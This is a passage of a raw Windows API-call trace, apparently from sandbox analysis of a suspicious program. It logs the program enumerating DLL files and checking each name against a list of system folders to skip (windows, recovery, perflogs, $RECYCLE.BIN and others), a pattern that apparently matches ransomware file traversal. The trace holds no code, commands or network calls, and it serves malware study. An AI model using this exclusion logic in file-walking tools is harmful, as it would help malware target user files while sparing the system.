hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.228] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a6407d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="AP750A~1.DLL")) returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2=".") returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="..") returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="...") returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="windows") returned -1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="recovery") returned -1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="perflogs") returned -1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="documents and settings") returned -1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="system volume information") returned -1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-processthreads-l1-1-1.dll", lpString2="msocache") returned -1 [0101.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0101.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0101.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 41 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0101.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0101.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0101.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=41, lpMultiByteStr=0x22d298, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 41 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0101.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.228] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1814809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2=".") returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="..") returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="...") returned 1 [0101.228] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="windows") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="recovery") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="perflogs") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="documents and settings") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="system volume information") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="msocache") returned -1 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0101.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 32 [0101.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0101.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-synch-l1-2-0.dll", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 32 [0101.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0101.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0101.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.229] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbdee689, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbdee689, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdee689, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2=".") returned 1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="..") returned 1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="...") returned 1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="windows") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="recovery") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.229] lstrcmpiW (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="msocache") returned -1 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0101.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0101.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0101.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0101.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0101.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.230] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37acc11, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37acc11, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37acc11, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2=".") returned 1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="..") returned 1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="...") returned 1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="windows") returned -1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="recovery") returned -1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="perflogs") returned -1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="documents and settings") returned -1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="system volume information") returned -1 [0101.230] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="msocache") returned -1 [0101.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0101.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0101.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0101.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0101.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.230] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x44a38de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x44a38de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44a38de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0101.230] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2=".") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="..") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="...") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="windows") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="recovery") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="msocache") returned -1 [0101.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241268, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0101.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0101.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0101.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0101.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.231] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42d8c51, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x58c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="APFD9C~1.DLL")) returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2=".") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="..") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="...") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="windows") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="recovery") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.231] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="msocache") returned -1 [0101.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.232] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4cd5a2f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4cd5a2f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4cd5a2f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="APC00F~1.DLL")) returned 1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2=".") returned 1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="..") returned 1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="...") returned 1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="windows") returned -1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="recovery") returned -1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="perflogs") returned -1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="documents and settings") returned -1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="system volume information") returned -1 [0101.232] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="msocache") returned -1 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0101.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.232] RtlAllocateHeap (HeapHandle=0x1e0000, 